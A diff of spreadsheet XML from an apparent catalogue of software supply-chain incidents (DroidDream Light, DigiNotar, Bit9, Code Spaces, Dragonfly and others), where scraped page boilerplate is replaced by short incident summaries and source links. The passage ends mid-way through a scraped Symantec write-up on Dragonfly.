+          <t>Multiple applications available in the official Android Market were found to contain malware that can compromise a significant amount of personal data. Likely created by the same developers who brought DroidDream to market back in March, 26 applications were found to be infected with a stripped down version of DroidDream called Droid Dream Light (DDLight).</t>
         </is>
       </c>
       <c r="D10" t="inlineStr">
         <is>
           <t>https://blog.lookout.com/update-security-alert-droiddreamlight-new-malware-from-the-developers-of-droiddream</t>
-        </is>
-      </c>
-      <c r="E10" t="inlineStr">
-        <is>
-          <t>['page', 'oop', 'page', 'view', 'popular', 'page', 'mobile', 'device', 'lookout', 'endpoint', 'lookout', 'endpoint', 'additional', 'link', 'mobile', 'endpoint', 'lookout', 'intelligence', 'enterprise', 'datum', 'protection', 'additional', 'link', 'secure', 'cloud', 'access', 'casb', 'lookout', 'secure', 'internet', 'access', 'lookout', 'private', 'access', 'privacy', 'policy', 'cookie', 'policy', 'transparency', 'report', 'share', 'personal', 'information', 'compliance', 'info', 'compliance', 'info', 'sitemap', 'lookout', 'lookout', '®', 'lookout', 'shield', 'design', '®', 'lookout', 'shield', 'design', 'trademark', 'lookout', 'lookout', 'mobile', 'security', '®', 'lookout', '®', 'trademark', 'lookout', 'lookout', 'common', 'trademark', 'right', 'lookout', 'design', 'lookout', 'cloud', 'access', 'lookout', 'secure', 'internet', 'access', 'lookout', 'private', 'access', 'lookout', 'endpoint', 'endpoint', 'mobile', 'endpoint', 'lookout', 'intelligence', 'solution', 'hybrid', 'work', 'meet', 'compliance', 'privacy', 'regulation', 'collaboration', 'mitigate', 'threat', 'cloud', 'merger', 'acquisition', 'industry', 'education', 'federal', 'government', 'state', 'local', 'government', 'financial', 'service', 'manufacturing', 'support', 'enterprise', 'support', 'login', 'enterprise', 'support', 'program']</t>
         </is>
       </c>
     </row>
@@ -717,17 +667,12 @@
       </c>
       <c r="C11" t="inlineStr">
         <is>
-          <t>page found oops page youre trying view isnt popular pages check instead protect mobile devices lookout endpoint lookout endpoint additional links lookout mobile endpoint lookout intelligence enterprise data protection lookout cloud lookout cloud additional links lookout secure cloud access casb lookout secure internet access lookout secure private access ztna legal privacy policy cookie policy transparency report sell share personal information compliance info compliance info sitemap lookout lookout® lookout shield design® lookout shield design® lookout multicolormultishaded wingspan design® registered trademarks lookout united states countries shecurity® lookout mobile security® powered lookout® registered trademarks lookout united states lookout maintains common trademark rights everything protected lookout ciphercloud shield design lookout cloud cloud lookout secure cloud access lookout secure internet access lookout secure private access lookout endpoint endpoint lookout mobile endpoint lookout intelligence solutions secure hybrid work meet compliance privacy regulations promote collaboration safely detect mitigate threats adopt cloud faster accelerate mergers acquisitions industries healthcare education federal government state local government financial services manufacturing support enterprise support login enterprise support programs contact</t>
+          <t>A new variant of DroidDream Light was found in the Android Market, which Google already removed from the Android Market.</t>
         </is>
       </c>
       <c r="D11" t="inlineStr">
         <is>
           <t>https://blog.lookout.com/security-alert-new-droiddream-light-variant-published-to-android-market</t>
-        </is>
-      </c>
-      <c r="E11" t="inlineStr">
-        <is>
-          <t>['page', 'oop', 'page', 'view', 'popular', 'page', 'mobile', 'device', 'lookout', 'endpoint', 'lookout', 'endpoint', 'additional', 'link', 'mobile', 'endpoint', 'lookout', 'intelligence', 'enterprise', 'datum', 'protection', 'additional', 'link', 'secure', 'cloud', 'access', 'casb', 'lookout', 'secure', 'internet', 'access', 'lookout', 'private', 'access', 'privacy', 'policy', 'cookie', 'policy', 'transparency', 'report', 'share', 'personal', 'information', 'compliance', 'info', 'compliance', 'info', 'sitemap', 'lookout', 'lookout', '®', 'lookout', 'shield', 'design', '®', 'lookout', 'shield', 'design', 'trademark', 'lookout', 'lookout', 'mobile', 'security', '®', 'lookout', '®', 'trademark', 'lookout', 'lookout', 'common', 'trademark', 'right', 'lookout', 'design', 'lookout', 'cloud', 'access', 'lookout', 'secure', 'internet', 'access', 'lookout', 'private', 'access', 'lookout', 'endpoint', 'endpoint', 'mobile', 'endpoint', 'lookout', 'intelligence', 'solution', 'hybrid', 'work', 'meet', 'compliance', 'privacy', 'regulation', 'collaboration', 'mitigate', 'threat', 'cloud', 'merger', 'acquisition', 'industry', 'education', 'federal', 'government', 'state', 'local', 'government', 'financial', 'service', 'manufacturing', 'support', 'enterprise', 'support', 'login', 'enterprise', 'support', 'program']</t>
         </is>
       </c>
     </row>
@@ -742,15 +687,14 @@
           <t>ALZip</t>
         </is>
       </c>
-      <c r="C12" t="inlineStr"/>
+      <c r="C12" t="inlineStr">
+        <is>
+          <t>Attackers with Chinese IP addresses uploaded malware to a server used to update ESTsoft's ALZip compression application, South Korean news outlets said. The upgrades eventually caused the compromise of 62 PCs at SK Communications that used the program. Attackers then tapped the machines to steal the names, user IDs, hashed passwords, birthdates, genders, telephone numbers, and street and email addresses contained in a database connected to the same network.</t>
+        </is>
+      </c>
       <c r="D12" t="inlineStr">
         <is>
           <t>https://www.theregister.com/2011/08/12/estsoft_korean_megahack/</t>
-        </is>
-      </c>
-      <c r="E12" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -765,15 +709,14 @@
           <t>DigiNotar</t>
         </is>
       </c>
-      <c r="C13" t="inlineStr"/>
+      <c r="C13" t="inlineStr">
+        <is>
+          <t>A security breach at DigiNotar resulted in the fraudulent issuing of over 500 digital certificates.</t>
+        </is>
+      </c>
       <c r="D13" t="inlineStr">
         <is>
           <t>https://media.threatpost.com/wp-content/uploads/sites/103/2011/09/07061400/rapport-fox-it-operation-black-tulip-v1-0.pdf</t>
-        </is>
-      </c>
-      <c r="E13" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -790,7 +733,7 @@
       </c>
       <c r="C14" t="inlineStr">
         <is>
-          <t>page isn’t available please check entered correct loading page you’re still trouble please contact website owner</t>
+          <t>The main kernel.org server was recently compromised by an unknown intruder. This person was able to gain root access.</t>
         </is>
       </c>
       <c r="D14" t="inlineStr">
@@ -799,11 +742,6 @@
 https://www.theregister.co.uk/2016/09/02/alleged_linux_hacker_arrested/</t>
         </is>
       </c>
-      <c r="E14" t="inlineStr">
-        <is>
-          <t>['page', 'available', 'correct', 'loading', 'page', 'trouble', 'contact', 'website', 'owner']</t>
-        </is>
-      </c>
     </row>
     <row r="15">
       <c r="A15" t="inlineStr">
@@ -818,17 +756,12 @@
       </c>
       <c r="C15" t="inlineStr">
         <is>
-          <t>skip content search products services operations research research naked sophos life search open main menu search products services operations research research naked sophos life naked insights education advice cybersecurity issues threats september update naked consolidate intelligence news location migrated naked sophos news platform naked august mom’s meals issues “notice data event” know took months notifications start still dont know exactly went heres advice naked august ep149 many cryptographers take change light bulb latest episode listen full transcript inside naked august using winrar sure patch code execution bugs… imagine clicked harmlesslooking image unknown application fired instead naked august smart light bulbs could give away password secrets cryptography isnt secrecy need take care authenticity imposters integrity tampering well naked august “snakes airplane mode” phone says it’s offline isn’t wysiwyg short except isnt naked august ep148 remembering crypto heroes celebrating true crypto bros listen full transcript available naked august warns scams lure mobile betatester apps iphone must come store except dont explain look naked august “grab hold give wiggle” card skimming still thing rise taptopay chipandpin hasnt world card skimming criminals naked load subscribe latest updates inbox categories interested you’re subscribed change region américa latina brasil deutschland english france iberia italia japan terms privacy privacy notice cookies legal general modern slavery statement speak sophos rights reserved</t>
+          <t>SophosLabs recently encountered malware-infected editions of the Angry Birds Space game which have been placed in unofficial Android app stores. Please note: The version of Angry Birds Space in the official Android market (recently renamed Google Play Store) is *not* affected.</t>
         </is>
       </c>
       <c r="D15" t="inlineStr">
         <is>
           <t>https://nakedsecurity.sophos.com/2012/04/12/android-malware-angry-birds-space-game/</t>
-        </is>
-      </c>
-      <c r="E15" t="inlineStr">
-        <is>
-          <t>['content', 'search', 'product', 'service', 'operation', 'research', 'research', 'naked', 'sophos', 'life', 'open', 'main', 'menu', 'search', 'product', 'service', 'operation', 'research', 'research', 'naked', 'sophos', 'life', 'naked', 'insight', 'education', 'advice', 'cybersecurity', 'issue', 'threat', 'naked', 'consolidate', 'intelligence', 'news', 'location', 'naked', 'sophos', 'news', 'platform', 'naked', 'mom', 'meal', 'issue', 'notice', 'datum', 'event', 'month', 'notification', 'here', 'advice', 'naked', 'ep149', 'many', 'cryptographer', 'change', 'light', 'bulb', 'late', 'episode', 'full', 'transcript', 'naked', 'winrar', 'code', 'execution', 'bug', 'image', 'unknown', 'application', 'naked', 'smart', 'light', 'bulb', 'password', 'secret', 'cryptography', 'secrecy', 'care', 'authenticity', 'imposter', 'integrity', 'naked', 'snake', 'airplane', 'mode', 'phone', 'offline', 'wysiwyg', 'short', 'naked', 'hero', 'true', 'bro', 'full', 'transcript', 'available', 'naked', 'scam', 'mobile', 'betatester', 'app', 'iphone', 'store', 'naked', 'hold', 'wiggle', 'card', 'skimming', 'thing', 'rise', 'taptopay', 'chipandpin', 'world', 'card', 'skimming', 'criminal', 'naked', 'load', 'late', 'update', 'inbox', 'category', 'interested', 'change', 'region', 'privacy', 'cookie', 'legal', 'general', 'modern', 'slavery', 'statement', 'sophos', 'right']</t>
         </is>
       </c>
     </row>
@@ -843,15 +776,14 @@
           <t>Digital Certificate</t>
         </is>
       </c>
-      <c r="C16" t="inlineStr"/>
+      <c r="C16" t="inlineStr">
+        <is>
+          <t>Adobe recently received two malicious utilities that appeared to be digitally signed using a valid Adobe code signing certificate. The discovery of these utilities was isolated to a single source. Adobe has identified a compromised build server with access to the Adobe code signing infrastructure.</t>
+        </is>
+      </c>
       <c r="D16" t="inlineStr">
         <is>
           <t>https://blogs.adobe.com/security/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html</t>
-        </is>
-      </c>
-      <c r="E16" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -868,17 +800,12 @@
       </c>
       <c r="C17" t="inlineStr">
         <is>
-          <t>access denied dont permission access httpwwwvmwarecomsecurityhtml server reference 18140a7c6817115929441e73e62</t>
+          <t>A malicious third party was able to illegally gain temporary access to one of Bit9's digital code-signing certificates that they then used to illegitimately sign malware.</t>
         </is>
       </c>
       <c r="D17" t="inlineStr">
         <is>
           <t>https://www.carbonblack.com/blog/bit9-and-our-customers-security/</t>
-        </is>
-      </c>
-      <c r="E17" t="inlineStr">
-        <is>
-          <t>['access', 'access']</t>
         </is>
       </c>
     </row>
@@ -893,15 +820,14 @@
           <t>Digital Certificate</t>
         </is>
       </c>
-      <c r="C18" t="inlineStr"/>
+      <c r="C18" t="inlineStr">
+        <is>
+          <t>The Winnti group used stolen certificates to sign its malware and stole source code and other IP of several gaming companies.</t>
+        </is>
+      </c>
       <c r="D18" t="inlineStr">
         <is>
           <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf</t>
-        </is>
-      </c>
-      <c r="E18" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -916,15 +842,14 @@
           <t>SimDisk and Songsari</t>
         </is>
       </c>
-      <c r="C19" t="inlineStr"/>
+      <c r="C19" t="inlineStr">
+        <is>
+          <t>The  auto-update mechanism related to the legitimate installer file SimDisk.exe and Songsari_setup.exe were compromised to include an additional malicious payload.</t>
+        </is>
+      </c>
       <c r="D19" t="inlineStr">
         <is>
           <t>https://blog.trendmicro.com/trendlabs-security-intelligence/compromised-auto-update-mechanism-affects-south-korean-users/</t>
-        </is>
-      </c>
-      <c r="E19" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -941,17 +866,12 @@
       </c>
       <c r="C20" t="inlineStr">
         <is>
-          <t>skip main content skip footer menu accenture accenture close menu back capabilities capabilities cloud cybersecurity data artificial intelligence digital engineering manufacturing emerging technology enterprise platforms finance risk management learning marketing experience metaverse private equity sales commerce strategic managed services strategy supply chain sustainability talent organization technology transformation industries industries aerospace defense automotive banking capital markets chemicals communications media consumer goods services energy health high tech industrial insurance life sciences natural resources public service retail software platforms travel federal government utilities think back accenture organization organization leaders locations media investors media investors media relations investor relations careers back careers home find find search jobs areas expertise entry level jobs internships experienced professionals executive leaders military veterans life accenture life accenture rewards benefits training development stories change hire hire recruitment process contact careers locations linkedin facebook instagram search current country united states default english countries languages argentina spanish australia english austria german belgium english brazil portuguese bulgaria english canada english canada french chile spanish chinahong kong english chinamainland chinese chinamainland english colombia spanish costa rica english czech republic english denmark english finland english france french germany german greece english hungary english india english indonesia english ireland english israel english italy italian japan japanese latvia english luxembourg english malaysia english mauritius english mexico spanish morocco english netherlands english zealand english norway english philippines english poland english poland polish portugal portuguese romania english saudi arabia english singapore english slovakia english south africa english spain spanish sweden english switzerland english thailand english english united kingdom english english reinvent business could close announcement accenture learnvantage investing three years help companies people gain essential skills achieve greater business value economy expand close case study putting data driver’s seat smart helping auto brand smart reinvent automotive sales hightech marketing platform commerce core revolutionizing vehicle purchasing groundbreaking business model expand close event adobe summit march vegas immerse insights innovators leaders share groundbreaking solutions strategies value faster expand close perspective supply chain networks generative generative promises radical reinvention work it’s opening world possibility supply chain leaders here’s cscos turn technology’s immense potential higher business performance expand close research report work workforce workers reinvented generative transform entire value chains—and nature work leaders need lead learn ways drive business performance productive creative meaningful work everyone expand close research report commercial banking trends balance optimizing current environment investing technology unlock future opportunities lays groundwork trends expand close research report reinvention generative five imperatives csuite must address reinvent generative expand close research report technology vision technology becoming human intuitive humanlike intelligence easy integrate across lives organizations adopt refine emerging tech today poised success tomorrow expand carousel slider control value every embrace change create value stakeholders every part world play pause previous next metaverse meets public good world economic forum accenture microsoft built purposedriven platform metaverse drive action cooperation revolutionize progress read cybersecurity orbit outer space gets crowded contested qusecure protecting communications data transmission agility required world postquantum computing read generative transforming customer service sifting thousands emails daily tedious work generative makes easy multinational bank using generative quickly process respond client emails used settling asset servicing reconciliation trades normally massive manual task directs emails right teams drafts responses employees check result faster enjoyable customer service boost worker efficiency costeffective operations read mondelēz international’s data transformation global snacking giant laying tasty foundation reinvention growth accenture helping mondelēz international embrace power data build strong digital core implement interoperable cloudenabled technology read creating sense belonging global retailer accenture cocreated multiyear inclusion diversity strategy facilitate greater sense belonging people read gives electric vehicle charging jolt seeking sustainability people buying electric vehicles keep powered liberty global accenture developed renewable energy brand makes installing home chargers easy affordable read reimagining saudi arabia’s economy five years saudi data artificial intelligence authority partnership accenture built strong foundation globally competitive data aidriven economy read global recognition awards toggle awards card detail view admired company years fortune’s list world’s admired companies together create 360° value clients people shareholders partners communities expand toggle awards card detail view great place work worlds best workplaces™ list recognition based feedback people—measuring level trust pride camaraderie work expand toggle awards card detail view ethical business leader consecutive years ethisphere’s world’s ethical companies strive right thing powerful force good expand careers grow career heart change time shine bring ingenuity curiosity ideas join accenture news play pause march accenture reports secondquarter fiscal results march accenture teams nvidia showcase aipowered immersive client experiences defender carousel slider control change preference center careers contact locations sitemap privacy statement terms conditions cookie policysettings accessibility statement sellshare personal information accenture rights reserved</t>
+          <t>The attackers subverted the distribution server of GOM Player software and delivered a malicious version of the software to users. Upon connecting to the application website to update the installed software, users were redirected to a different website, controlled by the attackers. As a result, the users received a modified version of the software bundled with a Trojan.</t>
         </is>
       </c>
       <c r="D20" t="inlineStr">
         <is>
           <t>https://www.contextis.com/en/blog/context-threat-intelligence-the-monju-incident</t>
-        </is>
-      </c>
-      <c r="E20" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'skip', 'footer', 'menu', 'accenture', 'accenture', 'close', 'menu', 'back', 'capability', 'capability', 'cybersecurity', 'datum', 'artificial', 'intelligence', 'engineering', 'manufacturing', 'technology', 'enterprise', 'platform', 'risk', 'management', 'marketing', 'experience', 'metaverse', 'private', 'equity', 'sale', 'strategic', 'service', 'strategy', 'supply', 'chain', 'sustainability', 'talent', 'organization', 'technology', 'transformation', 'industry', 'industry', 'aerospace', 'defense', 'automotive', 'banking', 'capital', 'market', 'chemical', 'communication', 'medium', 'consumer', 'good', 'service', 'energy', 'health', 'high', 'tech', 'industrial', 'insurance', 'life', 'science', 'natural', 'resource', 'public', 'service', 'retail', 'software', 'platform', 'federal', 'government', 'utility', 'organization', 'organization', 'leader', 'medium', 'investor', 'medium', 'investor', 'medium', 'relation', 'investor', 'relation', 'career', 'career', 'search', 'job', 'area', 'expertise', 'entry', 'level', 'job', 'internship', 'professional', 'executive', 'leader', 'military', 'accenture', 'reward', 'benefit', 'training', 'development', 'story', 'recruitment', 'process', 'contact', 'career', 'location', 'linkedin', 'facebook', 'search', 'current', 'country', 'business', 'announcement', 'accenture', 'learnvantage', 'year', 'company', 'people', 'essential', 'skill', 'great', 'business', 'value', 'economy', 'close', 'case', 'study', 'data', 'driver', 'seat', 'smart', 'auto', 'brand', 'smart', 'automotive', 'sale', 'hightech', 'marketing', 'platform', 'core', 'revolutionizing', 'vehicle', 'groundbreaking', 'business', 'model', 'close', 'event', 'summit', 'immerse', 'insight', 'innovator', 'leader', 'groundbreaking', 'solution', 'strategy', 'value', 'close', 'perspective', 'supply', 'chain', 'network', 'generative', 'promise', 'radical', 'reinvention', 'work', 'world', 'possibility', 'supply', 'chain', 'leader', 'technology', 'immense', 'potential', 'high', 'business', 'performance', 'close', 'research', 'report', 'work', 'workforce', 'worker', 'generative', 'transform', 'entire', 'value', 'chain', 'nature', 'work', 'leader', 'lead', 'way', 'business', 'performance', 'productive', 'creative', 'meaningful', 'work', 'close', 'research', 'report', 'commercial', 'banking', 'trend', 'balance', 'current', 'environment', 'technology', 'future', 'opportunity', 'groundwork', 'trend', 'close', 'research', 'report', 'reinvention', 'imperative', 'csuite', 'generative', 'close', 'research', 'report', 'technology', 'vision', 'technology', 'human', 'intuitive', 'intelligence', 'life', 'organization', 'tech', 'today', 'success', 'tomorrow', 'carousel', 'slider', 'control', 'value', 'embrace', 'change', 'value', 'stakeholder', 'part', 'world', 'pause', 'previous', 'next', 'metaverse', 'public', 'good', 'world', 'platform', 'metaverse', 'drive', 'action', 'cooperation', 'progress', 'cybersecurity', 'orbit', 'outer', 'space', 'contested', 'qusecure', 'communication', 'data', 'transmission', 'agility', 'world', 'generative', 'customer', 'service', 'thousand', 'email', 'tedious', 'work', 'generative', 'easy', 'multinational', 'bank', 'generative', 'process', 'client', 'email', 'asset', 'servicing', 'reconciliation', 'trade', 'massive', 'manual', 'task', 'email', 'right', 'team', 'draft', 'response', 'employee', 'result', 'enjoyable', 'customer', 'service', 'worker', 'efficiency', 'costeffective', 'operation', 'data', 'transformation', 'global', 'giant', 'tasty', 'foundation', 'reinvention', 'growth', 'accenture', 'international', 'power', 'datum', 'strong', 'digital', 'core', 'implement', 'interoperable', 'technology', 'sense', 'global', 'retailer', 'accenture', 'multiyear', 'inclusion', 'diversity', 'strategy', 'great', 'sense', 'people', 'electric', 'vehicle', 'jolt', 'sustainability', 'people', 'electric', 'vehicle', 'liberty', 'global', 'accenture', 'renewable', 'energy', 'brand', 'home', 'charger', 'easy', 'affordable', 'read', 'economy', 'year', 'saudi', 'datum', 'artificial', 'intelligence', 'partnership', 'accenture', 'strong', 'foundation', 'competitive', 'datum', 'economy', 'global', 'recognition', 'award', 'award', 'card', 'detail', 'view', 'company', 'year', 'fortune', 'list', 'world', 'company', '°', 'value', 'client', 'people', 'shareholder', 'partner', 'community', 'toggle', 'award', 'card', 'detail', 'great', 'place', 'work', 'world', 'good', 'workplace', '™', 'list', 'recognition', 'feedback', 'people', 'level', 'trust', 'pride', 'camaraderie', 'work', 'toggle', 'award', 'card', 'detail', 'ethical', 'business', 'leader', 'consecutive', 'year', 'world', 'ethical', 'company', 'right', 'thing', 'powerful', 'force', 'good', 'expand', 'career', 'career', 'heart', 'change', 'time', 'ingenuity', 'curiosity', 'idea', 'accenture', 'news', 'play', 'pause', 'accenture', 'secondquarter', 'fiscal', 'result', 'accenture', 'team', 'immersive', 'client', 'experience', 'defender', 'carousel', 'slider', 'control', 'change', 'preference', 'center', 'career', 'contact', 'location', 'sitemap', 'privacy', 'statement', 'term', 'condition', 'cookie', 'policysetting', 'accessibility', 'statement', 'personal', 'information', 'accenture', 'right']</t>
         </is>
       </c>
     </row>
@@ -968,17 +888,12 @@
       </c>
       <c r="C21" t="inlineStr">
         <is>
-          <t>threatpost podcasts malware vulnerabilities infosec insiders webinars search hacker exploits vulnerabilities mine 620k dogecoin previous article possible truecrypt fork works next article hacker puts hosting service code spaces business author michael mimoso june minute read share article cloudbased codehosting service code spaces announced today going business hacker deleted machines customer data backups code spaces codehosting software collaboration platform business attacker deleted company’s data backups officials wrote lengthy explanation apology company’s website promising spend current resources helping customers recover whatever data left “code spaces able operate beyond point cost resolving issue date expected cost refunding customers left without service paid code spaces irreversible position financially terms ongoing credibility” read note point time alternative cease trading concentrate supporting affected customers exporting remaining data left beginning ddos attack initiated yesterday accompanied intrusion code spaces’ amazon control panel extortion demands left code spaces officials along hotmail address supposed contact attackers “upon realization somebody access control panel started investigate access gained access person data systems” code spaces said became clear machine access achieved intruder private keys” code spaces said changed passwords quickly discovered attacker created backup logins recovery attempts noticed attacker began deleting artifacts panel finally managed panel access back removed snapshots buckets ami’s instances several machine instances” code spaces said summary data backups machine configurations offsite backups either partially completely deleted” summary data backups machine configurations offsite backups either partially completely deleted” amazon services customers responsible credential management amazon however builtin support twofactor authentication used accounts accounts managed identity access management tool enables control user access including individual credentials role separation least privilege within hours code spaces went viable business devastation company reported repositories—backups snapshots—were deleted volumes containing database files also deleted nodes node left untouched company said cache code spaces services includes promises full redundancy code duplicated distributed among data centers three continents “backing data thing meaningless without recovery plan recovery plan wellpracticed proven work time time again” code spaces said “code spaces full recovery plan proven work fact practiced” share article cloud hacks suggested articles cybersecurity trends bigger budgets endpoint emphasis cloud insider threats redefined workfromhome trend continue define landscape mobile endpoints become attack vector choice according forecasts january what’s next ransomware ransomware response demands wholeofbusiness plan next attack according roundtable experts december dark pricing skyrockets microsoft servers paymentcard data underground marketplace pricing server access compromised payment card data ddosforhire services surging december infosec insider securing move hybrid cloud august physical maintenance never afterthought july conti’s reign chaos costa rica crosshairs july impacts cyber insurance july rethinking vulnerability management heightened landscape july threatpost first stop news home contact feeds copyright threatpost privacy policy terms conditions topics black breaking news cloud critical infrastructure cryptography facebook government hacks malware mobile podcasts privacy rsac analyst summit videos vulnerabilities threatpost topics cloud malware vulnerabilities privacy show black critical infrastructure cryptography facebook featured government hacks mobile podcasts rsac analyst summit slideshow videos authors elizabeth montalbano nate nelson threatpost home contact feeds search infosec insider infosec insider post infosec insider content written trusted community threatpost cybersecurity subject matter experts contribution goal bringing unique voice important cybersecurity topics content strives highest quality objective noncommercial sponsored sponsored content sponsored content paid advertiser sponsored content written edited members sponsor community content creates opportunity sponsor provide insight commentary pointofview directly threatpost audience threatpost editorial team participate writing editing sponsored content</t>
+          <t>Code Spaces, and code hosting platform, went out of business after a hacker deleted most of its machines, customer data and backups.</t>
         </is>
       </c>
       <c r="D21" t="inlineStr">
         <is>
           <t>https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/</t>
-        </is>
-      </c>
-      <c r="E21" t="inlineStr">
-        <is>
-          <t>['podcast', 'malware', 'insider', 'search', 'hacker', 'mine', 'dogecoin', 'previous', 'article', 'possible', 'fork', 'next', 'article', 'hacker', 'service', 'code', 'space', 'business', 'author', 'minute', 'read', 'share', 'article', 'service', 'code', 'space', 'today', 'business', 'hacker', 'machine', 'customer', 'backup', 'code', 'space', 'software', 'collaboration', 'platform', 'business', 'attacker', 'company', 'data', 'backup', 'official', 'lengthy', 'explanation', 'apology', 'company', 'website', 'current', 'resource', 'customer', 'datum', 'code', 'space', 'able', 'point', 'cost', 'issue', 'date', 'cost', 'customer', 'service', 'code', 'space', 'irreversible', 'position', 'ongoing', 'credibility', 'note', 'point', 'time', 'alternative', 'cease', 'trading', 'concentrate', 'affected', 'customer', 'datum', 'ddo', 'attack', 'yesterday', 'intrusion', 'code', 'space', 'amazon', 'panel', 'extortion', 'demand', 'code', 'space', 'official', 'hotmail', 'address', 'contact', 'attacker', 'realization', 'access', 'control', 'panel', 'access', 'access', 'person', 'datum', 'system', 'code', 'space', 'clear', 'machine', 'access', 'intruder', 'private', 'key', 'code', 'space', 'password', 'attacker', 'backup', 'login', 'recovery', 'attempt', 'attacker', 'artifact', 'panel', 'panel', 'access', 'snapshot', 'bucket', 'instance', 'several', 'machine', 'instance', 'code', 'space', 'summary', 'datum', 'backup', 'machine', 'configuration', 'offsite', 'backup', 'summary', 'datum', 'backup', 'machine', 'configuration', 'offsite', 'backup', 'amazon', 'service', 'customer', 'responsible', 'credential', 'management', 'amazon', 'support', 'twofactor', 'authentication', 'account', 'account', 'identity', 'access', 'management', 'tool', 'control', 'user', 'access', 'individual', 'credential', 'role', 'separation', 'least', 'privilege', 'hour', 'code', 'space', 'viable', 'business', 'devastation', 'company', 'repository', 'backup', 'snapshot', 'volume', 'database', 'file', 'node', 'untouched', 'company', 'space', 'service', 'promise', 'full', 'redundancy', 'code', 'datum', 'center', 'continent', 'datum', 'thing', 'meaningless', 'recovery', 'plan', 'recovery', 'plan', 'work', 'time', 'time', 'code', 'space', 'code', 'space', 'full', 'recovery', 'plan', 'work', 'fact', 'share', 'article', 'cloud', 'hack', 'article', 'cybersecurity', 'big', 'budget', 'endpoint', 'emphasis', 'cloud', 'insider', 'threat', 'workfromhome', 'trend', 'landscape', 'mobile', 'endpoint', 'attack', 'vector', 'choice', 'forecast', 'next', 'ransomware', 'ransomware', 'response', 'wholeofbusiness', 'plan', 'next', 'attack', 'roundtable', 'expert', 'dark', 'pricing', 'skyrocket', 'server', 'underground', 'marketplace', 'pricing', 'server', 'access', 'payment', 'card', 'datum', 'service', 'infosec', 'insider', 'move', 'hybrid', 'physical', 'maintenance', 'reign', 'cyber', 'insurance', 'vulnerability', 'management', 'landscape', 'home', 'contact', 'copyright', 'policy', 'term', 'topic', 'black', 'news', 'cloud', 'critical', 'infrastructure', 'cryptography', 'facebook', 'government', 'hack', 'podcast', 'privacy', 'rsac', 'analyst', 'summit', 'video', 'topic', 'privacy', 'black', 'critical', 'infrastructure', 'cryptography', 'facebook', 'government', 'mobile', 'podcast', 'rsac', 'analyst', 'summit', 'author', 'contact', 'search', 'infosec', 'insider', 'infosec', 'insider', 'post', 'infosec', 'insider', 'content', 'community', 'threatpost', 'cybersecurity', 'subject', 'matter', 'expert', 'goal', 'unique', 'voice', 'important', 'cybersecurity', 'topic', 'content', 'high', 'quality', 'objective', 'noncommercial', 'content', 'content', 'advertiser', 'content', 'member', 'sponsor', 'community', 'content', 'opportunity', 'sponsor', 'insight', 'commentary', 'editorial', 'team', 'editing', 'content']</t>
         </is>
       </c>
     </row>
@@ -995,17 +910,12 @@
       </c>
       <c r="C22" t="inlineStr">
         <is>
-          <t>products applications support company skip main content press enter sign skip auxiliary navigation press enter register skip main navigation press enter toggle navigation search options home communities communities communities enterprise software mainframe software symantec enterprise blogs blogs enterprise software mainframe software symantec enterprise events events enterprise software mainframe software symantec enterprise vmware water cooler groups enterprise software mainframe software symantec enterprise members endpoint protection view community home threads library events members back library dragonfly western energy companies sabotage recommend johnson ongoing cyberespionage campaign range targets mainly energy sector gave attackers ability mount sabotage operations victims attackers known symantec dragonfly managed compromise number strategically important organizations spying purposes used sabotage capabilities open could caused damage disruption energy supplies affected countries among targets dragonfly energy grid operators major electricity generation firms petroleum pipeline operators energy industry industrial equipment providers majority victims located united states spain france italy germany turkey poland dragonfly group well resourced range malware tools disposal capable launching attacks number different vectors ambitious attack campaign compromise number industrial control system equipment providers infecting software remote accesstype trojan caused companies install malware downloading software updates computers running equipment infections gave attackers beachhead targeted organizations’ networks also gave means mount sabotage operations infected computers campaign follows footsteps stuxnet first known major malware campaign target systems stuxnet narrowly targeted iranian nuclear program sabotage primary goal dragonfly appears much broader focus espionage persistent access current objective sabotage optional capability required addition compromising software dragonfly used spam email campaigns watering hole attacks infect targeted organizations group used main malware tools backdooroldrea trojankaragany former appears custom piece malware either written attackers prior publication symantec notified affected victims relevant national authorities computer emergency response centers certs handle respond internet incidents background dragonfly group also known vendors energetic bear appears operation since least active even longer dragonfly initially targeted defense aviation companies canada shifting focus mainly european energy firms early campaign european american energy sector quickly expanded scope group initially began sending malware phishing emails personnel target firms later group added watering hole attacks offensive compromising websites likely visited working energy order redirect websites hosting exploit exploit turn delivered malware victim’s computer third phase campaign trojanizing legitimate software bundles belonging three different equipment manufacturers dragonfly bears hallmarks statesponsored operation displaying high degree technical capability group able mount attacks multiple vectors compromise numerous third party websites process dragonfly targeted multiple organizations energy sector long period time current main motive appears cyberespionage potential sabotage definite secondary capability analysis compilation timestamps malware used attackers indicate group mostly worked monday friday activity mainly concentrated ninehour period corresponded working time zone based information likely attackers based eastern europe figure countries active infections attackers stole information infected computers tools employed dragonfly uses main pieces malware attacks remote access tool type malware provide attackers access control compromised computers dragonfly’s favored malware tool backdooroldrea also known havex energetic bear oldrea acts back door attackers victim’s computer allowing extract data install malware oldrea appears custom malware either written group created provides indication capabilities resources behind dragonfly group installed victim’s computer oldrea gathers system information along lists files programs installed root available drives also extract data computer’s outlook address book configuration files data written temporary file encrypted format sent remote commandandcontrol server controlled attackers majority servers appear hosted compromised servers running content management systems indicating attackers used exploit gain control server oldrea basic control panel allows authenticated user download compressed version stolen data particular victim second main tool used dragonfly trojankaragany unlike oldrea karagany available underground market source code version karagany leaked symantec believes dragonfly taken source code modified version detected symantec trojankaraganygen1 karagany capable uploading stolen data downloading files running executable files infected computer also capable running additional plugins tools collecting passwords taking screenshots cataloging documents infected computers symantec found majority computers compromised attackers infected oldrea karagany used around percent infections pieces malware similar functionality prompts attackers choose tool another remains unknown multiple attack vectors dragonfly group used least three infection tactics targets energy sector earliest method email campaign selected executives senior employees target companies receive emails containing malicious attachment infected emails subject lines “the account” “settlement delivery problem” emails single gmail address spam campaign began february continued june symantec identified seven different organizations targeted campaign number emails sent organization ranged 